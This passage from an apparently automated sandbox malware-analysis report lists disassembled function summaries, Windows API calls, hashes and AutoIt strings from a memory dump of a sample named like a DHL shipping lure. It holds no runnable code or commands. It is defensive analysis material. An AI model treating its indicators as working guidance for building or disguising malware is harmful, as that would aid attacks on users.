                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DB54
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00C5DB57
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00C5DB75
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00C5DB7E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C5DBA3
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00C5DBB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 3b24fcaa9789c99d469312867af4e915a187fee7ad035e93d380b40be3b51809
                                                                                        • Instruction ID: 8fcb5f59641a7ef66894c6282a19be1b9224d2eb1b18c89d7728499faca95ec5
                                                                                        • Opcode Fuzzy Hash: 3b24fcaa9789c99d469312867af4e915a187fee7ad035e93d380b40be3b51809
                                                                                        • Instruction Fuzzy Hash: 8D21B536600319AFDF20DFA9DC88DBF73ADEB09360B11812AFD15DB250D6709D858768
                                                                                        Function 00C76173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C77DB6
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C761C6
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C761D5
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C7620E
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00C76217
                                                                                        • WSAGetLastError.WSOCK32 ref: 00C76221
                                                                                        • closesocket.WSOCK32(00000000), ref: 00C7624A
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C76263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 910771015-0
                                                                                        • Opcode ID: 25d81a48776c401a8e7ef25fdf1c2bed778918c667de1405c79c600b2f8fe712
                                                                                        • Instruction ID: 09917f77adaa6a1f2a28a861384b338fef2525501a198b7e2390379b513cfda7
                                                                                        • Opcode Fuzzy Hash: 25d81a48776c401a8e7ef25fdf1c2bed778918c667de1405c79c600b2f8fe712
                                                                                        • Instruction Fuzzy Hash: 6D31A471600508AFDF10AF24CC85BBD7BACEB45751F048069FD19A72D2DB70AD45DB61
                                                                                        Function 00C58E90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C58F14
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C58F27
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C58F57
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 365058703-2258501812
                                                                                        • Opcode ID: a1beab3f4a0a7df2549aaa2157adacef8847dd029e36567829f3bbe572954daf
                                                                                        • Instruction ID: 233bcb450b0ede9c69e56b02dc15b8fd78e68ee9fdb93869e7c23ffe3d823f96
                                                                                        • Opcode Fuzzy Hash: a1beab3f4a0a7df2549aaa2157adacef8847dd029e36567829f3bbe572954daf
                                                                                        • Instruction Fuzzy Hash: AD21F279A00108BFDB14ABA09C45DFFB779DF05320F104729F825A71E1DA39198EEA24
                                                                                        Function 00C5F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 4cb46860f776ac1a590234fed59e53c6466a2a1803ecb804db1ba6845b828c63
                                                                                        • Instruction ID: 5631df18f27d2a2bbb7f847ad6763d76f35fc895f78effb2fb533906d9cdecbe
                                                                                        • Opcode Fuzzy Hash: 4cb46860f776ac1a590234fed59e53c6466a2a1803ecb804db1ba6845b828c63
                                                                                        • Instruction Fuzzy Hash: AF2137762042216AD738AA35AC02FA773E8DF59781F10443DFC9686491EF509ECBE299
                                                                                        Function 00C5DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DC09
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5DC2F
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00C5DC32
                                                                                        • SysAllocString.OLEAUT32 ref: 00C5DC53
                                                                                        • SysFreeString.OLEAUT32 ref: 00C5DC5C
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C5DC76
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00C5DC84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: ecf5e2894dc908e3c6f9dcbad37cfba0589882f98cee4977268bf1da7bb9244e
                                                                                        • Instruction ID: 81537dd2e6ffecd6bdedf100fb0cc7d2e32b2b9266b0fcd8a22392af4fe1efa0
                                                                                        • Opcode Fuzzy Hash: ecf5e2894dc908e3c6f9dcbad37cfba0589882f98cee4977268bf1da7bb9244e
                                                                                        • Instruction Fuzzy Hash: 2C218835604214AFDB20DFA8DC88EAB77ECEB49361B108126FD15CB261D670EDC5CB68
                                                                                        Function 00C5B1EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00C5B204
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C5B221
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5B259
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C5B27F
                                                                                        • _wcsstr.LIBCMT ref: 00C5B289
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3902887630-2594219639
                                                                                        • Opcode ID: bb5d215d4fc8c0b8f08d83acc4944686ce1401cd91ec301a66dcba10348b6183
                                                                                        • Instruction ID: f644b62ab30b62710403621f28738256320f7841c2c80b2a4c9bc175b27c68ce
                                                                                        • Opcode Fuzzy Hash: bb5d215d4fc8c0b8f08d83acc4944686ce1401cd91ec301a66dcba10348b6183
                                                                                        • Instruction Fuzzy Hash: ED2125352042107BEB255B35AC09F7F7FA8DF49711F10412EFC05CA161EF618D81A364
                                                                                        Function 00C59307 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C59320
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59352
                                                                                        • __itow.LIBCMT ref: 00C5936A
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59392
                                                                                        • __itow.LIBCMT ref: 00C593A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2983881199-2594219639
                                                                                        • Opcode ID: 5e6172b50d8ed5a90d661353f236cb2c7f05fa939a8c8cd23134cd3a2a3ebbfe
                                                                                        • Instruction ID: 69cad088ad72019015e275bf9360a80a86a6aa10a409d62c4ad0881ef27cf50c
                                                                                        • Opcode Fuzzy Hash: 5e6172b50d8ed5a90d661353f236cb2c7f05fa939a8c8cd23134cd3a2a3ebbfe
                                                                                        • Instruction Fuzzy Hash: 0021F539B00208FBDB10AB608C89EAE3BA8EB88711F044069FD04D71E0D6B09E899795
                                                                                        Function 00C875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C87632
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C8763F
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C8764A
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C87659
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C87665
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 0639194eefab6cdd79b376044359f5324c7ceff4099bbd814f3565c8c0a6acf6
                                                                                        • Instruction ID: 2653e4dbc0660312fd5a353a1728af35688407ff233d1d40491998ac92c35a16
                                                                                        • Opcode Fuzzy Hash: 0639194eefab6cdd79b376044359f5324c7ceff4099bbd814f3565c8c0a6acf6
                                                                                        • Instruction Fuzzy Hash: 2C11B6B1110219BFEF159F64CC85EEB7F6DEF08798F114215BA04A20A0D672DC21DBA4
                                                                                        Function 00C29AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00C29AE6
                                                                                          • Part of subcall function 00C23187: EncodePointer.KERNEL32(00000000), ref: 00C2318A
                                                                                          • Part of subcall function 00C23187: __initp_misc_winsig.LIBCMT ref: 00C231A5
                                                                                          • Part of subcall function 00C23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C29EA0
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C29EB4
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C29EC7
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C29EDA
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C29EED
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C29F00
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C29F13
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C29F26
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C29F39
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C29F4C
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C29F5F
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C29F72
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C29F85
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C29F98
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C29FAB
                                                                                          • Part of subcall function 00C23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C29FBE
                                                                                        • __mtinitlocks.LIBCMT ref: 00C29AEB
                                                                                        • __mtterm.LIBCMT ref: 00C29AF4
                                                                                          • Part of subcall function 00C29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C29AF9,00C27CD0,00CBA0B8,00000014), ref: 00C29C56
                                                                                          • Part of subcall function 00C29B5C: _free.LIBCMT ref: 00C29C5D
                                                                                          • Part of subcall function 00C29B5C: DeleteCriticalSection.KERNEL32(00CBEC00,?,?,00C29AF9,00C27CD0,00CBA0B8,00000014), ref: 00C29C7F
                                                                                        • __calloc_crt.LIBCMT ref: 00C29B19
                                                                                        • __initptd.LIBCMT ref: 00C29B3B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C29B42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 3567560977-0
                                                                                        • Opcode ID: 6438904bd1e3bf9052bc16dfed46cbdbeeeb8da800d33c0bfb39a26cc50da115
                                                                                        • Instruction ID: 2c163086b6282a129be4f9923cc5dffda8b4e8dc2933ba1646908960fabec2a3
                                                                                        • Opcode Fuzzy Hash: 6438904bd1e3bf9052bc16dfed46cbdbeeeb8da800d33c0bfb39a26cc50da115
                                                                                        • Instruction Fuzzy Hash: ECF09A32619731AAE6347B74BC07B8E2690EF02B30F200A2AF465D69D2EF71894165A4
                                                                                        Function 00C2406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C23F85), ref: 00C24085
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00C2408C
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00C24097
                                                                                        • DecodePointer.KERNEL32(00C23F85), ref: 00C240B2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: 3eb0170f74847a06afc4e3a206e3ea1ed070befc36908c13df9cb43ab8f27749
                                                                                        • Instruction ID: e6389870d27ec39baeb8511378311af85cfd38428672e1e5b860b4685ddb6eb9
                                                                                        • Opcode Fuzzy Hash: 3eb0170f74847a06afc4e3a206e3ea1ed070befc36908c13df9cb43ab8f27749
                                                                                        • Instruction Fuzzy Hash: 35E09271581240AFEA20AF62FD0DB4D3AA4B704742F148029F111E10E0CBB64641DB18
                                                                                        Function 00C664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3253778849-0
                                                                                        • Opcode ID: ef50ae5c25668af8b02fce2141f51b72681a68da295338dd53ce24912e083d37
                                                                                        • Instruction ID: 794f43b6b4cead917b1166026a592da2af697e5ab05e06436c0082943ca4c651
                                                                                        • Opcode Fuzzy Hash: ef50ae5c25668af8b02fce2141f51b72681a68da295338dd53ce24912e083d37
                                                                                        • Instruction Fuzzy Hash: 48617A7090425A9BCF21EF60DC82AFE37A9AF05308F058619F8566B2D3DB74E945EB50
                                                                                        Function 00C801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C802BD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C802FD
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C80320
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C80349
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C8038C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C80399
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4046560759-0
                                                                                        • Opcode ID: e1c42b4ccc4f4fd7202ad9226ddb29f56a133e54f1f824cdc65d0c5924d17cbe
                                                                                        • Instruction ID: fc79f1bde4ca27c2ece6195da0e6f55bc2aa9078f6b17995dee29acc048e327a
                                                                                        • Opcode Fuzzy Hash: e1c42b4ccc4f4fd7202ad9226ddb29f56a133e54f1f824cdc65d0c5924d17cbe
                                                                                        • Instruction Fuzzy Hash: 09515A31208200AFC714EF64C885E6FBBE8FF85318F54491DF995872A2DB31E949DB56
                                                                                        Function 00C85799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00C857FB
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00C85832
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C8585A
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00C858C9
                                                                                        • GetSubMenu.USER32(?,?), ref: 00C858D7
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C85928
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
